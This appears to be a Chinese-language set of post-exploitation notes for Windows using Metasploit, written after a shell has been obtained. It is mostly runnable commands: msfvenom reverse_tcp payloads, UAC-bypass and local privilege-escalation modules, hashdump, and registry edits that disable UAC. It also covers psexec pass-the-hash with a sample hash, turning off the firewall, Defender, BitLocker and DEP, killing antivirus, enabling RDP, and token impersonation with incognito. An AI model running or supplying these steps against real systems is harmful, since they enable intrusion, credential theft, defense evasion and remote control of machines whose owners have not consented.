在获取shell后,需要扩大战果

  • 提权
  • 信息收集
  • 渗透内网
  • 永久后门

    基于已有session

    msfvenom -a x86 —platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o 1.exe (与之前类似)
    获取system权限
    load system
    getsystem (会失败)

    绕过UAC(等用户同意)

    ```powershell use exploit/windows/local/ask ▪ set session ▪ set filename – use exploit/windows/local/bypassuac – use exploit/windows/local/bypassuac_injection ▪ set session ▪ set payload
  1. <a name="LhbXz"></a>
  2. ### 利用漏洞直接提权为 system
  3. ```powershell
  4. – use exploit/windows/local/ms13_053_schlamperei
  5. #后面三个不太管用
  6. – use exploit/windows/local/ms13_081_track_popup_menu
  7. – use exploit/windows/local/ms13_097_ie_registry_symlink
  8. – use exploit/windows/local/ppr_flatten_rec

图形化payload

  1. set payload windows/vncinject/reverse_tcp
  2.  set viewonly no #可操作

用户登入

load priv
hashdump
#关闭UAC
msf > sessions -i 2 #用前面得到system权限的session
meterpreter > shell #打开shell
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f #用reg创建键值
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f #成功关掉UAC
C:\Windows\system32>shutdown -r -t 0 #重启
#尝试利用
use exploit/windows/smb/psexec
set RHOST 192.168.1.118
set SMBUser John
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.119
exploit

关闭各种防护

msf > sessions -i 2 #用前面得到system权限的session
meterpreter > shell #打开shell
#关闭防火墙,需要管理员或system权限
C:\Windows\system32>netsh advfirewall set allprofiles state on #打开
C:\Windows\system32>netsh advfirewall set allprofiles state off #关闭
#关闭 windefend
C:\Windows\system32>net stop windefend
#bitlocker磁盘加密,强度极大
C:\Windows\system32>manage-bde -off C:
C:\Windows\system32>manage-bde -status C:
#关闭 DEP
C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff
#杀死防病毒软件
C:\Windows\system32>exit
run killav
run post/windows/manage/killav

开启远程桌面服务

run post/windows/manage/enable_rdp
screenshot #截图
use espia 
screengrab #也可以用这个截图

Token

用户每次登录,账号绑定临时的tokens
访问资源时提交 tokens 进行身份验证,类似于 web cookies

  • delegate tokens:交互登录会话
  • impersonate tokens:非交互登录会话
  • delegate tokens账号注销后变为 Impersonate Token,权限依然有效

    Incognito

    独立功能的软件,被 msf 集成在 metepreter 中
    无需密码或破解或获取密码 hash,窃取 tokens 将自己伪装成其他用户
    尤其适用于域环境下提权渗透多操作系统
    meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token lab\administrator
use exploit/windows/local/ms10_015_kitrap0d
meterpreter > execute -f cmd.exe -i -t #-t:使用当前假冒tokens执行程序
meterpreter > shell